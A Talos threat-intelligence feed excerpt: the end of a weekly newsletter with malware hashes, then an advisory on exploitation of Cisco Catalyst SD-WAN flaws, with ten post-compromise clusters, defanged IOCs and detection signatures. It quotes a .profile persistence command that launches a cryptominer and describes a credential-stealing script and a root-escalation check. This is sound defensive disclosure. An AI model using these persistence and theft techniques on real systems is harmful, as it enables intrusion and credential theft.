href="https://www.bleepingcomputer.com/news/security/official-checkmarx-jenkins-package-compromised-with-infostealer/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/breaking-things-to-keep-them-safe-with-philippe-laulheret/" rel="noreferrer noopener"><strong><u>Breaking things to keep them safe with Philippe Laulheret</u></strong></a>&#xA0;<br>From his memorable experiment using a green onion to bypass a biometric fingerprint reader to his experience on the frontlines of cybersecurity, Philippe&#xA0;shares the journey that led him to vulnerability research.&#xA0;</p><p><a href="https://blogs.cisco.com/security/inside-the-soc-ai-powered-dns-defense-against-ransomware" rel="noreferrer noopener"><strong><u>Inside the SOC: AI-powered DNS defense against ransomware</u></strong></a>&#xA0;<br>Learn how Cisco Talos&apos; advanced AI-driven detection, including domain generation algorithm (DGA) analysis,&#xA0;integrates within Cisco Secure access to&#xA0;proactively&#xA0;identify&#xA0;and predict malicious domains.&#xA0;</p><p><a href="https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/" rel="noreferrer noopener"><strong><u>Clustering and reuse of phone numbers in scam emails</u></strong></a>&#xA0;<br>Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an&#xA0;additional&#xA0;indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in&#xA0;scam&#xA0;emails.&#xA0;<strong>&#xA0;</strong>&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;VID001.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</strong>&#xA0;&#xA0;<br>MD5: dbd8dbecaa80795c135137d69921fdba&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;u112417.dat&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Variant:MalwareXgenMisc.29d4.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02</p>]]></content:encoded></item><item><title><![CDATA[Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities]]></title><description><![CDATA[Cisco Talos is tracking the active exploitation of CVE-2026-20182, an authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage.]]></description><link>https://blog.talosintelligence.com/sd-wan-ongoing-exploitation/</link><guid isPermaLink="false">69f9fb911abe200001ff3a6c</guid><category><![CDATA[Threat Advisory]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><category><![CDATA[Cisco Talos Web Filtering]]></category><category><![CDATA[Cisco Talos DNS Security]]></category><category><![CDATA[Landing Page Top Story]]></category><category><![CDATA[Top Story]]></category><dc:creator><![CDATA[Cisco Talos]]></dc:creator><pubDate>Thu, 14 May 2026 16:02:36 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_advisory.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos is tracking the active exploitation of <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW">CVE-2026-20182</a>, an authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage.</li><li>Successful exploitation of CVE-2026-20182 allows an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system.</li><li>The exploitation of CVE-2026-20182 appears to have been limited so far and Talos clusters this activity under <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">UAT-8616</a> with high confidence.</li><li>Talos is also aware of a series of threat actors, distinct from UAT-8616, that have been observed to be exploiting a different, previously disclosed set of vulnerabilities, in a new way than previously identified, beginning March 2026 - specifically <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122.</a> It is important to note that those vulnerabilities are distinct from and pre-date CVE-2026-20182. Cisco released <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">software updates and a security advisory</a> addressing those vulnerabilities in February <a>2026,</a> strongly recommending customers to upgrade.</li><li>We have identified multiple clusters of post-compromise activity, beginning March 2026, associated with the exploitation of CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 that deployed webshells and other malicious tooling, described in this post.</li><li>We observed the vast majority of this exploitation involved the use of ZeroZenX labs&#x2019; proof-of-concept and accompanying JSP-based webshell which we track as &#x201C;XenShell.&#x201D;</li></ul><hr><h2 id="uat-8616-in-the-wild-itw-exploitation-of-cve-2026-20182">UAT-8616 in-the-wild (ITW) exploitation of CVE-2026-20182</h2><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_advisory.jpg" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities"><p>Talos is aware of the active, in-the-wild (ITW) exploitation of <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW">CVE-2026-20182</a> in Cisco Catalyst SD-WAN Controller and Manager, that allows log in to the affected system as an internal, high-privileged, non-root user account. Talos clusters the exploitation of this vulnerability and subsequent post-compromise activity under <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">UAT-8616</a>, whom we assess is a highly sophisticated cyber threat actor. UAT-8616 previously exploited a similar vulnerability in Cisco Catalyst SD-WAN Controller, <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">CVE-2026-20127</a> to gain unauthorized access to SD-WAN systems.</p><p>UAT-8616 performed similar post-compromise actions after successfully exploiting CVE-2026-20182, as was observed in the exploitation of CVE-2026-20127 by the same threat actor. UAT-8616 attempted to add SSH keys, modify NETCONF configurations, and escalate to root privileges. Our findings indicate that the infrastructure used by UAT-8616 to carry out exploitation and post-compromise activities also overlaps with the Operational Relay Box (ORB) networks that Talos monitors closely.</p><p>Customers are strongly advised to follow the guidance and recommendations published in <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW">Cisco&apos;s Security Advisory on CVE-2026-20182</a>. Customer support is also available by initiating a <a href="https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#gsrq">TAC request</a>.&#xA0; Please refer to the Recommendations and Detection Guidance section for additional coverage information. We also recommend referring to <a href="http://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed">Rapid7&#x2019;s disclosure on CVE-2026-20182</a> for additional details.</p><h2 id="in-the-wild-itw-exploitation-of-cve-2026-20133-cve-2026-20122-and-cve-2026-20128">In-the-wild (ITW) exploitation of CVE-2026-20133, CVE-2026-20122, and CVE-2026-20128</h2><p>Talos is also aware of the widespread in-the-wild active exploitation of three vulnerabilities in unpatched Cisco Catalyst SD-WAN Manager infrastructure (<a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122</a>) that, when chained together, can allow a remote unauthenticated attacker to gain access to the device. Cisco released <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">software updates and a security advisory</a> addressing these vulnerabilities in February 2026. Following the public release of proof-of-concept code exploiting these vulnerabilities by ZeroZenX Labs in March, we observed the exploitation of the unpatched systems from March to April 2026.</p><p>Talos has observed <a>several other</a> threat clusters, separate from UAT-8616, leveraging publicly available proof-of-concept exploit code to deploy webshells to affected systems. Following successful exploitation, the webshells would allow the attacker to execute bash commands on the affected system.</p><p>The vast majority of observed exploitation attempts involved the use of the ZeroZenX Labs proof-of-concept code and accompanying <a href="https://github.com/zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE/blob/main/cmd.jsp">JavaServer Pages (JSP) shell</a>, which we are calling &#x201C;XenShell.&#x201D; However, we observed several other JSP-based webshell variants, which are outlined below.</p><p><em>Note: The CVE referenced in the ZeroZenX Labs proof-of-concept is incorrectly attributed to </em><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk"><em>CVE-2026-20127</em></a><em>. Talos&#x2019; analysis indicates that the targeted CVEs in the proof-of-concept are in-fact CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122.</em></p><p>So far, Talos has observed the following clusters of malicious activity being conducted post successful exploitation of CVE-2026-20133, CVE-2026-20122, and CVE-2026-20128: Cluster #1 to Cluster #10.</p><h3 id="cluster-1">Cluster 1</h3><p>This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 since at least March 6, 2026. Following the exploitation of these CVEs, the threat actor deployed a variant of the Godzilla web shell under the filename &#x201C;20251117022131.jsp&#x201D;. This variant is associated with a publicly available <a href="https://github.com/Tas9er/ByPassGodzilla">GitHub project</a>.</p><p>The following IPs were used to carry out the exploit and subsequently interact with the shell:</p><ul><li>38.181.52[.]89</li><li>89.125.244[.]33</li><li>89.125.244[.]51</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-deb361d2-0c87-407c-8fb4-08515c3a6aeb.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="856" height="937" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-deb361d2-0c87-407c-8fb4-08515c3a6aeb.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-deb361d2-0c87-407c-8fb4-08515c3a6aeb.png 856w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 1. Tas9er Godzilla shellcode deployed in Cluster #1.</span></figcaption></figure><h3 id="cluster-2">Cluster 2</h3><p>This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 since at least March 10, 2026. Following their exploitation, the threat actor deployed a variant of the Behinder webshell under the filename &#x201C;conf.jsp&#x201D;. This variant has been modified to only use Base64 for encoding, as opposed to AES encryption commonly observed in other variants.</p><p>The IP &#x201C;71.80.85[.]135&#x201D; was used to carry out the exploit and interact with the shell.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-2102a1a7-59e5-4cb0-9655-f5d040c4cfb7.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="856" height="937" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-2102a1a7-59e5-4cb0-9655-f5d040c4cfb7.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-2102a1a7-59e5-4cb0-9655-f5d040c4cfb7.png 856w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 2. Behinder webshell deployed in Cluster #2.</span></figcaption></figure><h3 id="cluster-3">Cluster 3</h3><p>This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 since at least March 4, 2026. Following successful exploitation, the threat actor deployed XenShell under the name &#x201C;sysv.jsp&#x201D;, before returning hours later to deploy a variant of the Behinder webshell under the filename &#x201C;sysinit.jsp&#x201D;.</p><p>The IP &#x201C;212.83.162[.]37&#x201D; was used to carry out the exploit and interact with the shell.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-aed13c93-08fb-48c7-a75c-42d4e2da8f45.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="875" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-aed13c93-08fb-48c7-a75c-42d4e2da8f45.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-aed13c93-08fb-48c7-a75c-42d4e2da8f45.png 937w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 3. Behinder webshell deployed in Cluster #3.</span></figcaption></figure><h3 id="cluster-4">Cluster 4</h3><p>This cluster has been actively exploiting CVE-2026-20133, CVE-2026-20128 and CVE-2026-20122 since at least March 3, 2026. Following successful exploitation, the threat actor deployed a variant of the Godzilla webshell under the filename &#x201C;vmurnp_ikp.jsp&#x201D;.</p><p>The following IPs are attributed to this cluster:</p><ul><li>38.60.214[.]92</li><li>65.20.67[.]134</li><li>104.233.156[.]1</li><li>194.233.100[.]40</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-f1acdf08-ff24-4985-8261-a7466198daa1.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="449" height="936"><figcaption><span style="white-space: pre-wrap;">Figure 4. Godzilla webshell deployed in Cluster #4.</span></figcaption></figure><h3 id="cluster-5">Cluster 5</h3><p>Talos observed the deployment, beginning March 13, 2026, of a malware agent compiled off the publicly available <a href="https://github.com/Adaptix-Framework/AdaptixC2">AdaptixC2</a> red team framework. The filename was &#x201C;systemd-resolved&#x201D; and the agent&#x2019;s command and control (C2) is &#x201C;194[.]163[.]175[.]135:4445&#x201D;.</p><p>The authors have changed the default TCP banner for the sample from &#x201C;AdapticC2 server&#x201D; to &#x201C;shadowcore&#x201D;. Hosted on Contabo GmbH, this is likely a VPS. As of March 28, 2026, this C2 IP, &#x201C;194[.]163[.]175[.]135&#x201D; hosted:</p><ul><li>A Mythic C2 server on port 7443, along with a Mythic C2 server certificate with serial number: fece5b954e69b2c6a8d0a1029631a0d7</li><li>Another AdaptixC2 server on port 31337</li><li>An open SSH service on port 22, likely for administration of server</li></ul><h3 id="cluster-6">Cluster 6</h3><p>In another cluster of activity, since at least March 5, 2026, <a href="https://github.com/bishopfox/sliver">Sliver</a>, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename &#x201C;CWan&#x201D;. The Sliver sample&#x2019;s C2 is &#x201C;mtls://23.27.143[.]170:443&#x201D;.</p><h3 id="cluster-7">Cluster 7</h3><p>In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script from the remote location &#x201C;83.229.126[.]195&#x201D;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-30689ca1-e62c-48c8-8549-45f764a97a34.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="465" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-30689ca1-e62c-48c8-8549-45f764a97a34.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-30689ca1-e62c-48c8-8549-45f764a97a34.png 937w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 5. Download and startup script for XMRig.</span></figcaption></figure><p>This IP, residing in Hong Kong, is also a known <a href="https://www.virustotal.com/gui/ip-address/83.229.126.195/relations">C2 server for Cobalt Strike.</a></p><h3 id="cluster-8">Cluster 8</h3><p>Activity observed in Cluster 8 began as early as March 10, 2026. This cluster consisted of a few key malicious tools. The first tool is <a href="https://github.com/lcvvvv/kscan/blob/cf76af2d6f7392caec0b96b930e6fa52e9f27af6/README_ENG.md">KScan</a>, an asset mapping tool, that can port scan, TCP fingerprint, capture banners for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute-force cracking and brute-force RDP. The tool&#x2019;s filename and Go packages have been renamed to &#x201C;QScan&#x201D; by the authors, but it is essentially the same implementation as the open-source GitHub version.</p><p>The second tool, named &#x201C;agent1&#x201D;, is a Nim-based implant. It is most likely based on the open-source <a href="https://github.com/MythicAgents/Nimplant">tools</a>, <a href="https://github.com/chvancooten/NimPlant/">Nimplant</a>, but is further modified to include:</p><ul><li>Additional commands/capabilities, such as cd to directories; cat files; download and upload files; execute files using bash; and collect system information such as username, hostname, hwid, process listings, etc.</li><li>C2 endpoints for communication, registration/check-ins, obtain tasks, provide results, and more:<ul><li>/api/v1/handshake</li><li>/api/v1/results</li><li>/api/v1/payloads</li><li>/api/v1/exfiltrate</li><li>/api/v1/tasks</li><li>/api/v1/init</li></ul></li><li>An RSA public key to be used by the agent to communicate with the C2 hosted on &#x201C;hxxp://13[.]62[.]52[.]206:5004&#x201D;.</li></ul><p>This tool was downloaded and executed post-compromise from the remote location &#x201C;replit[.]dev&#x201D;:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-950b2cf7-7052-4283-b7c5-3ff4c3821498.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="248" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-950b2cf7-7052-4283-b7c5-3ff4c3821498.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-950b2cf7-7052-4283-b7c5-3ff4c3821498.png 937w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 6. Download and startup script for the Nim-based implant.</span></figcaption></figure><p>The attackers executed this command on the compromised system while connected from the source IP &#x201C;79[.]135[.]105[.]208&#x201D;. This is likely a ProtonVPN node.</p><p>Replit is an AI platform that facilitates building applications using AI. It is therefore likely that the backdoor was created with the help of AI to resemble Nimplant&#x2019;s functionality with the additional capabilities and deviations listed above.</p><h3 id="cluster-9">Cluster 9</h3><p>In this cluster, since at least March 17, 2026, Talos observed the deployment of an XMRig miner and a peer-based proxying and tunneling tool.</p><p>This tool, <a href="https://github.com/hackerschoice/gsocket">gsocket</a>, is a peer-based proxying and tunneling tool that allows peers to connect to each other within the Global Socket Relay Network (GSRN). GSRN allows peers to connect to each other using node IDs, which are unique 16-byte identifiers for nodes with the network.</p><p>This sample obtains the peer or C2 node to connect to by reading and Base58 decoding the accompanying &#x201C;defunct[.]dat&#x201D; file. The C2 peer ID is:</p>
<!--kg-card-begin: html-->
<pre>
78 c4 a2 37 56 27 7b b7 de 20 06 76 34 d2 63 c9  
</pre>
<!--kg-card-end: html-->
<p>The tool is activated by placing a malicious command in the .profile file:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-0e5a9bc6-5972-4712-9d68-e31fc019883a.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="292" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-0e5a9bc6-5972-4712-9d68-e31fc019883a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-0e5a9bc6-5972-4712-9d68-e31fc019883a.png 937w" sizes="(min-width: 720px) 720px"></figure><p>This decodes to:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e68d4b40-40f1-486d-833e-7790193a9d4e.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="248" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-e68d4b40-40f1-486d-833e-7790193a9d4e.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-e68d4b40-40f1-486d-833e-7790193a9d4e.png 937w" sizes="(min-width: 720px) 720px"></figure><p><strong>XMRig Miner</strong></p><p>Accompanying gsocket was a Monero miner and its scripts and configuration files. The miner is also activated via the user profile (.profile):</p>
<!--kg-card-begin: html-->
<pre>
/tmp/moneroocean/miner.sh --config=/tmp/moneroocean/config_background.json &gt;/dev/null 2&gt;&amp;1
</pre>
<!--kg-card-end: html-->
<p>The &#x201C;miner.sh&#x201D; will find all processes named XMRig, kill them, and then start its own copy of XMRig:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-66f5c5b6-d9d2-441f-8e1b-b7740140ea01.png" class="kg-image" alt="Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities" loading="lazy" width="937" height="508" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-66f5c5b6-d9d2-441f-8e1b-b7740140ea01.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-66f5c5b6-d9d2-441f-8e1b-b7740140ea01.png 937w" sizes="(min-width: 720px) 720px"></figure><h3 id="cluster-10">Cluster 10</h3><p>This cluster of activity, since at least Mar 13, 2026, consisted of a credential stealer deployed along with accompanying scripts. The main script, named &#x201C;loot_run.sh&#x201D;, attempted to obtain:</p><ul><li>The admin user&#x2019;s hashdump</li><li>JSON Web Tokens (JWT) key chunks that are used for REST API authentication</li><li>AWS credentials for vManage: AccesKeyId, SecretAccessKey and Token</li></ul><p>Two other helper scripts were also deployed in this cluster to check if the current user could escalate to root. The scripts contained a hardcoded password and used it to execute the command <code>su root &#x2013;c id</code>. The output is checked for the string &#x201C;uid=0(root)&#x201D; to verify successful escalation.</p><h2 id="recommendations-and-detection-guidance">Recommendations and detection guidance</h2><p>Customers are strongly advised to follow the guidance and recommendations published in <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW">Cisco&apos;s Security Advisory on CVE-2026-20182</a>. Customer support is also available by initiating a <a href="https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#gsrq">TAC request</a>. Talos strongly recommends that customers and partners using Cisco Catalyst SD-WAN technology follow the steps outlined in this advisory to help protect their environments. We also recommend referring to <a href="http://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed">Rapid7&#x2019;s disclosure on CVE-2026-20182</a> for additional details.</p><p>Snorts SIDs for CVE-2026-20182 are: 66482 - 66483</p><p></p><p>Please refer to the official <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">Cisco Security Advisory on CVE-2026-20133, CVE-2026-20122, and CVE-202128</a> for the latest information regarding affected products, Indicators Of Compromise (IOCs), and mitigation steps.</p><p>Snort SIDs for CVE-2026-20133: 66468 - 66469</p><p>Snort SIDs for CVE-2026-20122: 66461 - 66462</p><p>Snort SIDs for CVE-2026-20128: 66468 - 66469</p><p>Snort SIDs for the threats detailed in Clusters #1 through 10 are:</p><ul><li>Snort2: 66200, 66201, 66202</li><li>Snort3: 301461, 301462, 66252</li></ul><p>ClamAV signatures for the malicious tooling associated with these clusters:</p><ul><li>Unix.Tool.QScanCrack-10059958</li><li>Unix.Backdoor.NimPlant-10059957</li><li>Unix.Tool.GSocket-10059956</li><li>Unix.Backdoor.JSPZapLoot-10059955</li><li>Unix.Backdoor.GopherRAT-10059941</li><li>Unix.Backdoor.JSPZap-10059944</li><li>Unix.Backdoor.JSPZapExcEnc-10059945</li><li>Unix.Backdoor.GopherRAT-10059941</li></ul><h2 id="iocs">IOCs</h2><p>IOCs for the Clusters detailed above are also available in our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2026/05" rel="noreferrer">here</a>.</p><h3 id="cluster-1-1">Cluster 1</h3><ul><li>38.181.52[.]89</li><li>89.125.244[.]33</li><li>89.125.244[.]51</li></ul><h3 id="cluster-2-1">Cluster 2</h3><ul><li>71.80.85[.]135&#xA0;</li></ul><h3 id="cluster-3-1">Cluster 3</h3><ul><li>212.83.162[.]37</li></ul><h3 id="cluster-4-1">Cluster 4</h3><ul><li>38.60.214[.]92</li><li>65.20.67[.]134</li><li>104.233.156[.]1</li><li>194.233.100[.]40</li></ul><h3 id="cluster-5adaptixc2">Cluster 5 - AdaptixC2</h3><ul><li>f6f8e0d790645395188fc521039385b7c4f42fa8b426fd035f489f6cda9b5da1</li></ul><h3 id="cluster-5adaptixc2-c2-server">Cluster 5 - AdaptixC2 C2 server</h3><ul><li>194[.]163[.]175[.]135:4445</li></ul><h3 id="cluster-5adaptixc2-c2-ip">Cluster 5 - AdaptixC2 C2 IP</h3><ul><li>194[.]163[.]175[.]135</li></ul><h3 id="cluster-6sliver">Cluster 6 - Sliver</h3><ul><li>02654acfb21f83485393ba8b14bd8862b919b9ec966fc6768f6aac1338a45ee8</li></ul><h3 id="cluster-6sliver-c2-over-mtls">Cluster 6 - Sliver C2 over mTLS</h3><ul><li>mtls[://]23.27.143[.]170:443</li></ul><h3 id="cluster-6sliver-c2-ip">Cluster 6 - Sliver C2 IP</h3><ul><li>23.27.143[.]170</li></ul><h3 id="cluster-7xmrig-downloader-script">Cluster 7 - XMRig downloader script</h3><ul><li>0ed72d52347bfe4a78afff8a6982a64050c8fc86d8957a20eeb3e0f3f5342ed0</li></ul><h3 